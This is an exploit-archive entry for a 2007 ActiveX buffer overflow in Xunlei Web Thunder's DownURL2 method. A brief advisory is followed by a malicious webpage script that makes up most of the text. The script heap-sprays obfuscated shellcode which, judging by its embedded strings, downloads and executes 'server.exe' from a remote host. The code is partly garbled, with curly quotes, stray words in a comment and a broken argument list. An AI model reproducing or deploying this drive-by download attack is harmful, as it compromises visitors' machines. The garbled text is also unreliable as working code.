Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow

2007-09-20T00:00:00
ID EXPLOITPACK:495D84E15064345F026E458F2EFCC9FC
Type exploitpack
Reporter 7jdg
Modified 2007-09-20T00:00:00

Description

Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow

                                        
                                            source: https://www.securityfocus.com/bid/25751/info

Xunlei Web Thunder is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied data.

An attacker may exploit this issue by enticing victims into visiting a maliciously crafted webpage.

Successfully exploiting this issue will allow the attacker to execute arbitrary code within the context of the application using the ActiveX control (typically Microsoft Internet Explorer). Failed exploit attempts will result in a denial-of-service condition.

This issue affects Xunlei Web Thunder 5.6.8.344; other versions may also be affected.

 <OBJECT id=target classid=clsid: EEDD6FF9-13DE-496B-9A1C-D78B3215E266></OBJECT>  
 <SCRIPT language=javascript>  
  var she132132132132llc13ode = unescape (“%u9090 " + " %u9090 " +    
 “%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c” +   
 “%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378” +   
 “%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b” +   
 “%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7” +   
 “%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1” +   
 “%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103” +   
 “%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904” +   
 “%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b” +   
 “%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e” +   
 “%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d” +   
 “%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320” +   
 “%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344” +   
 “%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc” +   
 “%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0” +   
 “%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab” +   
 “%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f” +   
 “%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574” +   
 “%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e” +   
 “%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00” +   
 “%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c” +   
 “%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54” +   
 “%u6946%u656c%u0041 " +   
 “%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672%u7265%u652e%u6578%u0000”); /这 village right watching snow 按 钮 breaking 专 house   
 var IsNop1236326312 = '';   
 var bi3123g123665blo2131ck = unescape (“%u9090%u9090”);   
 var IsNop1236326312 = '';   
 var he132132aders123132ize = 20;   
 var IsNop1236326312 = '';   
 var sl21123112ack312231312space = he132132aders123132ize+she132132132132llc13ode.length;   
 var IsNop1236326312 = '';   
 while (bi3123g123665blo2131ck.length<sl21123112ack312231312space) bi3123g123665blo2131ck+=bi3123g123665blo2131ck;   
 fillblock = bi3123g123665blo2131ck.substring (0, sl21123112ack312231312space);   
 block = bi3123g123665blo2131ck.substring (0, bi3123g123665blo2131ck.length-sl21123112ack312231312space);   
 while (block.length+sl21123112ack312231312space<0x40000) blockblock = block+block+fillblock;   
 memory = new Array ();   
 for (x=0; x<300; x++) memory [x] = block + she132132132132llc13ode;   
 var b1u1231ff312er = '';   
 var IsNop1236326312 = '';   
 var IsNop1236326312 = '';   
 while (b1u1231ff312er.length < 4057) b1u1231ff312er+= " \ x0a \ x0a \ x0a \ x0a ";   
 b1u1231ff312er+= " \ x0a ";   
 b1u1231ff312er+= " \ x0a ";   
 b1u1231ff312er+= " \ x0a ";   
 b1u1231ff312er+= " \ x0a \ x0a \ x0a \ x0a ";   
 b1u1231ff312er+= " \ x0a \ x0a \ x0a \ x0a ";    
 var yes= " 1111 ";   
 target.DownURL2 (b1u1231ff312er, yes, yes and yes);   
 var IsNop1236326312 = '';   
   
 </SCRIPT>  
   
 <body oncontextmenu= " return false " onselectstart= " return false " ondragstart= " return false " >